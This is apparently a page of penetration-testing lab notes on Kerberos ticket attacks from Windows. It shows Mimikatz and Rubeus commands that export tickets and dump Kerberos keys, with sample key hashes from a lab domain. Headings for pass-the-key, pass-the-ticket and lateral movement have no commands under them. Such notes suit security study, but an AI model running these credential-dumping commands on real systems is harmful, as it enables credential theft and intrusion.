search

Using Windows

hashtag
Mimikatz (Export Tickets)

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export

mimikatz # exit
Bye!
c:\tools> dir *.kirbi

hashtag
Rubeus (Export Tickets)

c:\tools> Rubeus.exe dump /nowrap

hashtag
Mimikatz (Extract Kerberos Keys)

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::ekeys
<SNIP>

Authentication Id : 0 ; 444066 (00000000:0006c6a2)
Session           : Interactive from 1
User Name         : plaintext
Domain            : HTB
Logon Server      : DC01
Logon Time        : 7/12/2022 9:42:15 AM
SID               : S-1-5-21-228825152-3134732153-3833540767-1107

         * Username : plaintext
         * Domain   : inlanefreight.htb
         * Password : (null)
         * Key List :
           aes256_hmac       b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60
           rc4_hmac_nt       3f74aa8f08f712f09cd5177b5c1ce50f
           rc4_hmac_old      3f74aa8f08f712f09cd5177b5c1ce50f
           rc4_md4           3f74aa8f08f712f09cd5177b5c1ce50f
           rc4_hmac_nt_exp   3f74aa8f08f712f09cd5177b5c1ce50f
           rc4_hmac_old_exp  3f74aa8f08f712f09cd5177b5c1ce50f
<SNIP>

  • AES256_HMAC and RC4_HMAC can be used in OPTH or Pass-The- key

hashtag
Mimikatz (Pass the Key)

hashtag
Rubeus (Pass the Key)

hashtag
Pass the Ticket (Rubeus)

hashtag
Using the rc4_hmac

hashtag
Using the .kirbi file frmo the disk

Using Base64 format

hashtag
Pass the Ticket (Mimikatz)

hashtag
PowerShell Remoting (Lateral Movement)

hashtag
Using mimikatz

hashtag
Using rubeus

hashtag
Creating a sacrificial process

hashtag
Pass the ticket

PreviousPass the Ticket (Kerberos)NextUsing Linux

Last updated